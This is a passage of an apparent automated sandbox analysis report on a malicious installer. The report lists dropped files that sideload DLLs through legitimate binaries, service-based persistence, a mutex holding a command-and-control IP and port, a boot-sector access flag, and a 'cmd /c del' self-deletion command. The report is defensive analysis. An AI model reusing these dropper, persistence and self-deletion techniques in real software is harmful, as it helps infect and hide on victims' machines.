                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7B1C40 SHGetFolderPathW,lstrcatW,CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,SysAllocString,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,4_2_6C7B1C40
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035282E4 GetModuleFileNameA,ExpandEnvironmentStringsA,_strncoll,wsprintfA,CopyFileA,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlen,RegSetValueExA,6_2_035282E4
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\users\Wegame\Jump to behavior
                    Source: C:\Users\Wegame\Wegame.exeMutant created: \Sessions\1\BaseNamedObjects\_TGP_EXISTS_MUTEX_NAME_
                    Source: C:\ProgramData\RuntimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\154.91.65.2:8000:Rsgiyy icwocqug
                    Source: C:\Users\Wegame\Wegame.exeMutant created: \Sessions\1\BaseNamedObjects\WeGameCN_Mutex
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_03
                    Source: C:\Users\Wegame\Wegame.exeMutant created: \Sessions\1\BaseNamedObjects\446e43c4-a90f-56a2-a09d-e5123a135e92
                    Source: setup#U67e5#U8be2_pf2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: setup#U67e5#U8be2_pf2024.exeReversingLabs: Detection: 52%
                    Source: Wegame.exeString found in binary or memory: -launcher=
                    Source: Wegame.exeString found in binary or memory: -launcher
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: -launcher=
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: [IsForInstallation]This is a start from install.[IsForInstallation]This is a start from uninstall.[IsForInstallation]This is not a start from install.--debugdebugstamp_recordmain_start[wegame_launch][step1]Main start.-multi_launcher=wegame.exewegamex.exemulti_launcher_TGP_EXISTS_MUTEX_NAME_[main] wegame already exist.-d-p-ouin=start_from_hostoffline=offline-launcher=[Launcher]Command line game_id not find.launcher_ver[Launcher]Command line version not find.[Launcher]Parser launcher command json fail.[Launcher]Launcher info: %s[Launcher]Launcher parser fail: %s[Launcher]No launcher info.[main]get and set cmd info from cmd_start_info successfullydelete_qb_cookies.txt\clean_cache_flag.dat[CleanCache] need clean page cache.[main]WeGame is in tool mode.[Sys_wrapper]initialize COM library. Error code = %xierd_tgp_daemon.exe[wegame_launch][step2]App inited.app initedbegin...normal end.[main]
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: -launcher
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: Svr_Destory_Tray_IconWeGameCN_Mutex-launcherloop_event_nameZOMBIE-IERD-TGP-31F73356-9B60-ABCD-9FF0-F27E3A9BBEC231F73356-9B60-4B52-9FF0-F27E3A9BBEC2TGP_EXTERNAL_MESSAGE_RECEIVERStaticB15238A8-2061-4a6e-AB8D-F2533B92D794sys_beginsys_ende:\dailybuild_dev\wegame_client\codes\common\src\app.cppcannot set app path, %s[wegame_quit][step1]exit_app:{}.[wegame_quit][step2]exit_app, will_count_:{}[app][Application::process]do_exit_, count:%d, will_count_:%d, can:%s
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: id-cmc-addExtensions
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: set-addPolicy
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: LoadLibraryExA\/AddDllDirectoryauthauth-intauth-confnonce="realm="algorithm=qop="00000001AUTHENTICATEmd5-sessusername="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%snoncestalerealmopaqueqopMD5-sessSHA-256SHA-256-SESSSHA-512-256SHA-512-256-SESSuserhash%s:%s:%s%s:%s:%08x:%s:%s:%susername="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=%08x, qop=%s, response="%s"username="%s", realm="%s", nonce="%s", uri="%s", response="%s"%s, opaque="%s"%s, algorithm="%s"%s, userhash=trueOKToo long hexadecimal numberIllegal or missing hexadecimal sequenceMalformed encoding foundWrite errorBad content-encoding found`
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: $Scope-Start-Op Scope-End-Op$Perf-Warning-Op,Monitor-Warning-Op Trace-Task-Op Trace-Expt-OpLEVL@
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: run-by-unity-helper
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: /?helplocalepower-onpower-on-in-fullscreenfullscreenclose-at-power-offstart-pausedversionversion-textsethostpassworddatacentermoidnew-tabnew-windowbaredisable-ssl-checkingreloadz-order-chillrun-by-unity-helperquery-licensecan-runnew-snunmountnew-vmfeedbackorigin -s There is a space character in your options. Perhaps you are trying to pass two separate options (such as -q -x) in the first line of your configuration file. If so, you need to merge them (-qx).-%cThe option "%s" requires a value.
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: mkisofs 1.15a12 -v -J -R -V VMware Tools -o d:/build/ob/bora-1463223/bora-vmsoft/build/release/install/output/windows.iso d:/build/ob/bora-1463223/bora-vmsoft/build/release/install/winimage
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: d:/build/ob/bora-1463223/bora/apps/install/setup/setup.cpp
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: d:/build/ob/bora-1463223/bora/apps/install/setup/setup.cpp[Info] MsiInstallProduct returned %d --> %s [%Iu][Info] User cancelled installation[Error] %s[Error] The required resource '%s' is missing[Info] Cleaned out installation information for %sHELPER_UIOLDCODESINSTMSIWINSTMSIAinstmsiw.exePROPERTIESinstmsia.exeMINIMUM_NT_MSIMINIMUM_9X_MSISFXINSERTPATCHVM_DATABASELANGUAGESPRODUCTCODEPRODUCTNAMEOPERATION[Info] Will uninstall %s[Info] cacheMod (%s) returned %d" "cacheMod.exe{3B410500-1802-488E-9EF1-4B11992E0440}{B53D42E8-872B-430E-82D4-80065A31FCE1}[Info] Existing product version is older[Info] Existing product version is the same[Info] Existing product version is newer[Info] New product version number is %s[Info] Found existing product %s with version %s[Error] Can't get version for installed product %s (%d)VersionString[Info] Found existing product %s[Info] No existing products found[Info] Checking for existing product %s[Info] Setup exit code is %d[Info] Failed to cleanup extracted files in %s[Info] MsiApplyPatch returned %d and szInstallPackage = {null} and eInstallType = INSTALLTYPE_DEFAULT[Info] Calling MsiApplyPatch with szPatchPackage = %sNOT_REACHED %s:%d
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: change user /INSTALL
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: File_ListDirectory%s\*.*kernel32Schange user /INSTALLSOFTWARE\Microsoft\.NETFramework\policy\v1.1\Microsoft.NET\Framework\v1.1.IsWow64ProcessHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOT%s: %s%m/%d/%y %H:%M:%S Failed to free module: %dCannot free NULL libraryFreeing library: %dFailed to create key %s: %dFailed to set value: %s\%s\%s: %dCannot query key value %s\%s\%s: %ldCannot open the registry %s\%s: %ldInvalid keyName in Util_CreateKey
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: digt ist.qSetup konnte das Windows-Installationsprogramm nicht auf eine Version aktualisieren, die Schema '%s' unterst
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: ltige Msi-Version. Stellen Sie sicher, dass das Element numerisch ist und mindestens '%d' lautet.\Zur Aktualisierung des Windows-Installationsprogramms sind Administratorrechte erforderlich.
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: Setup kann keine Dateien nach %s extrahieren. Stellen Sie sicher, dass Sie zum Bearbeiten dieses Verzeichnisses berechtigt sind.0Setup konnte die instmsi-Datei '%1'nicht finden.CSetup konnte das Windows-Installationsprogramm nicht aktualisieren.
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: 0PA[Fehler beim Installieren des Pakets. Windows-Installationsprogramm hat '%d' zur
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: r dieses Paket ist eine neuere Version des Windows-Installationsprogramms erforderlich. M
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: chten Sie die Version des Windows-Installationsprogramms auf Ihrem System aktualisieren?aSetup wurde mit einer falschen Betriebsressource '%s' erstellt und kann nicht fortgesetzt werden.&
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: Setup versucht, das Entfernen der Registrierungsinformationen des %s-Installationsprogramms von diesem Computer zu erzwingen. Fahren Sie erst fort, wenn Sie %s auf normalem Weg
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: Setup kann nicht fortgesetzt werden. Das Microsoft-Laufzeit-DLL-Installationsprogramm konnte die Installation nicht abschlie
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: PWD=/cygdrive/d/build/ob/bora-1463223/bora-vmsoft/install/Windows
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: FE2X=C:\Program FilesPROMPT=$P$G$SPWD=/cygdrive/d/build/ob/bora-1463223/bora-vmsoft/install/WindowsPYTHON=D:/build/toolchain/win32/python-2.4.3/python.exePYTHONDONTWRITEBYTECODE=1PYTHONPATH=D:\build\toolchain\noarch\argparse-1.1\lib\python2.6\site-packages;D:\build\apps\gobuild\bin\..RELEASE_BINARIES=d:/build/ob/bora-1463223/publishRELEASE_EXT_PACKAGES=//releng-pa1/current/packagesRELEASE_PACKAGES=d:/build/ob/bora-1463223/publishRELTYPE=GAREMOVE_LOCK=D:/build/toolchain/win32/python-2.6.1/python.exe D:/build/apps/gobuild/bin/gobuildc.py bora-1463223 removelockSCAN_FOR_VIRUSES=1SCMTREESROOT=D:/build/treesSCRIPTNAME=gobuildsSERVERBUILDDIR=d:/build/ob/bora-1463223/bora-vmsoft/build/release/serverSESSIONNAME=ConsoleSHARED_BUILD_MACHINE=1SHELL=D:/build/toolchain/win32/cygwin-1.5.19-4/bin/sh.exeSHLVL=1SIGN_RELEASE_BINARIES=1SIGN_RELEASE_RP<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: Attempting to pre-install inf file: "%s"
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: %s change user /INSTALLSOFTWARE\Microsoft\.NETFramework\policy\v1.1\Microsoft.NET\Framework\v1.1.kernel32IsWow64ProcessHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOTSOFTWARE\VMware, Inc.\VMware Tools\Private%s: %s%m/%d/%y %H:%M:%S Failed to install inf: 0x%08xSuccessfully installed infFailed to get proc address for SetupCopyOEMInfASetupCopyOEMInfAFailed to load setupapi.dll: %dsetupapi.dllAttempting to pre-install inf file: "%s"UpdateDriverForPlugAndPlayDevicesA failed: %dUpdateDriverForPlugAndPlayDevicesA succeededFailed to find UpdateDriverForPlugAndPlayDevicesA: %dUpdateDriverForPlugAndPlayDevicesAFailed to load newdev.dll: %dnewdev.dll...\*NT OS Type is unknown: Major: %i Minor: %iFailed to free module: %dCannot free NULL libraryFreeing library: %dFailed to create key %s: %dFailed to set value: %s\%s\%s: %dCannot query key value %s\%s\%s: %ldCannot open the registry %s\%s: %ldCannot query key value %s\%s\%s: %dInvalid keyName in Util_CreateKey
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: %s change user /INSTALLSOFTWARE\Microsoft\.NETFramework\policy\v1.1\Microsoft.NET\Framework\v1.1.kernel32IsWow64ProcessHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOTSOFTWARE\VMware, Inc.\VMware Tools\Private%s: %s%m/%d/%y %H:%M:%S Failed to install inf: 0x%08xSuccessfully installed infFailed to get proc address for SetupCopyOEMInfASetupCopyOEMInfAFailed to load setupapi.dll: %dsetupapi.dllAttempting to pre-install inf file: "%s"UpdateDriverForPlugAndPlayDevicesA failed: %dUpdateDriverForPlugAndPlayDevicesA succeededFailed to find UpdateDriverForPlugAndPlayDevicesA: %dUpdateDriverForPlugAndPlayDevicesAFailed to load newdev.dll: %dnewdev.dll...\*NT OS Type is unknown: Major: %i Minor: %iFailed to free module: %dCannot free NULL libraryFreeing library: %dFailed to create key %s: %dFailed to set value: %s\%s\%s: %dCannot query key value %s\%s\%s: %ldCannot open the registry %s\%s: %ldCannot query key value %s\%s\%s: %dInvalid keyName in Util_CreateKey
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: wARNING: Failed to get address for GetProfilesDirectory()GetProfilesDirectoryFailed to load userenv.dll: %duserenv.dllchange user /INSTALLSOFTWARE\Microsoft\.NETFramework\policy\v1.1\Microsoft.NET\Framework\v1.1.kernel32IsWow64ProcessHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOT%s: %s%m/%d/%y %H:%M:%S Failed to install inf: 0x%08xSuccessfully installed infFailed to get proc address for SetupCopyOEMInfASetupCopyOEMInfAFailed to load setupapi.dll: %dsetupapi.dllAttempting to pre-install inf file: "%s"UpdateDriverForPlugAndPlayDevicesA failed: %dUpdateDriverForPlugAndPlayDevicesA succeededFailed to find UpdateDriverForPlugAndPlayDevicesA: %dUpdateDriverForPlugAndPlayDevicesAFailed to load newdev.dll: %dnewdev.dllNT OS Type is unknown: Major: %i Minor: %iFailed to create key %s: %dFailed to set value: %s\%s\%s: %dCannot query key value %s\%s\%s: %ldCannot open the registry %s\%s: %ldInvalid keyName in Util_CreateKey
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: wARNING: Failed to get address for GetProfilesDirectory()GetProfilesDirectoryFailed to load userenv.dll: %duserenv.dllchange user /INSTALLSOFTWARE\Microsoft\.NETFramework\policy\v1.1\Microsoft.NET\Framework\v1.1.kernel32IsWow64ProcessHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOT%s: %s%m/%d/%y %H:%M:%S Failed to install inf: 0x%08xSuccessfully installed infFailed to get proc address for SetupCopyOEMInfASetupCopyOEMInfAFailed to load setupapi.dll: %dsetupapi.dllAttempting to pre-install inf file: "%s"UpdateDriverForPlugAndPlayDevicesA failed: %dUpdateDriverForPlugAndPlayDevicesA succeededFailed to find UpdateDriverForPlugAndPlayDevicesA: %dUpdateDriverForPlugAndPlayDevicesAFailed to load newdev.dll: %dnewdev.dllNT OS Type is unknown: Major: %i Minor: %iFailed to create key %s: %dFailed to set value: %s\%s\%s: %dCannot query key value %s\%s\%s: %ldCannot open the registry %s\%s: %ldInvalid keyName in Util_CreateKey
                    Source: unknownProcess created: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Users\Wegame\Wegame.exe "C:\users\Wegame\Wegame.exe"
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Users\Statr\kill.exe "C:\users\Statr\kill.exe"
                    Source: C:\Users\Statr\kill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\ProgramData\RuntimeBroker.exe "C:\ProgramData\RuntimeBroker.exe"
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Users\Wegame\Wegame.exe "C:\users\Wegame\Wegame.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Users\Statr\kill.exe "C:\users\Statr\kill.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\ProgramData\RuntimeBroker.exe "C:\ProgramData\RuntimeBroker.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nulJump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: setup#U67e5#U8be2_pf2024.exeStatic file information: File size 24674304 > 1048576
                    Source: C:\Users\Statr\kill.exeFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                    Source: setup#U67e5#U8be2_pf2024.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x16a5000
                    Source: Binary string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdbxx9t source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr
                    Source: Binary string: wextract.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader\Upgrader.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\lib\Release\adapt_for_imports.pdb source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\tools\toolsinstutil.pdbD source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\lib\Release\common.pdb source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\bin\Release\wegame.pdb source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr
                    Source: Binary string: kkeyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: Wegame.exe, 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\setup.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: wextract.pdbe\setup\iexpress\wextract\obj\i386\wextract.pdbU source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\tools\toolsinstutil.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader9x\Upgrader9x.pdbT} source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u60\4407\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr
                    Source: Binary string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdb source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\setup.pdbHyB source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdbPkl source: RuntimeBroker.exe, 00000006.00000002.3338332862.000000006C6B3000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\cacheMod\cacheMod.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdb source: setup#U67e5#U8be2_pf2024.exe, libcef.dll.0.dr
                    Source: Binary string: keyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader9x\Upgrader9x.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdbP source: setup#U67e5#U8be2_pf2024.exe, libcef.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\toolsNT\NTinstutil.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\bin\Release\wegame.pdbhh1GCTL source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr
                    Source: Binary string: e\setup\iexpress\wextract\obj\i386\wextract.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00462960 __EH_prolog3_GS,memset,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ,??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z,GetPrivateProfileStringW,GetPrivateProfileStringW,memset,GetPrivateProfileStringW,SimpleUString::operator=,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,SimpleUString::operator=,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z,??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z,PathFileExistsW,PathFileExistsA,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,LoadLibraryW,GetProcAddress,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_00462960
                    Source: jli.dll.0.drStatic PE information: real checksum: 0x2ae97 should be: 0x2d1ab
                    Source: libcef.dll.0.drStatic PE information: real checksum: 0xc6b7 should be: 0x13bf0
                    Source: common.dll.0.drStatic PE information: section name: .QMGuid
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046E40B push ecx; ret 3_2_0046E41E
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046FAB6 push ecx; ret 3_2_0046FAC9
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_10025DC0 push eax; ret 3_2_10025DEE
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_003B1695 push ecx; ret 4_2_003B16A8
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7B7630 push ecx; ret 4_2_6C7B7643
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7BC825 push ecx; ret 4_2_6C7BC838
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DADBE push ecx; ret 6_2_005DADD1
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DB466 push ecx; ret 6_2_005DB479
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_6C6B2A85 push ecx; ret 6_2_6C6B2A98
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352C384 push eax; ret 6_2_0352C3B2
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352EBD6 push cs; iretd 6_2_0352EBAA
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352EAD4 push cs; iretd 6_2_0352EBAA
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352F9AD push ebp; retf 6_2_0352F9B0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352ED86 push ebx; ret 6_2_0352ED87
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_1000B780 push eax; ret 6_2_1000B7AE
                    Source: setup#U67e5#U8be2_pf2024.exeStatic PE information: section name: .text entropy: 7.453269170375049

                    Persistence and Installation Behavior

                    barindex
                    Contains functionality to infect the boot sector
                    Source: C:\Users\Wegame\Wegame.exeCode function: __EH_prolog3_GS,memset,__snprintf_s,CreateFileA,memset,memset,DeviceIoControl,memset,memset,memset,isalnum,isalnum,GetLastError,CloseHandle, \\.\PhysicalDrive%d3_2_6BD8477F
                    Source: C:\Users\Wegame\Wegame.exeCode function: __EH_prolog3_GS,memset,__snprintf_s,CreateFileA,memset,DeviceIoControl,memset,memset,DeviceIoControl,FindCloseChangeNotification, \\.\PhysicalDrive%d3_2_6BD84503
                    Drops PE files with benign system names
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\wm.exeJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\ProgramData\libcef.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\adapt_for_imports.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\Wegame.exeJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Statr\kill.exeJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\ProgramData\RuntimeBroker.exeJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\wm.exeJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Statr\jli.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\Lua51.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\common.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\ProgramData\libcef.dllJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\ProgramData\RuntimeBroker.exeJump to dropped file
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeFile created: C:\Users\Wegame\adapt_for_imports.dllJump to dropped file
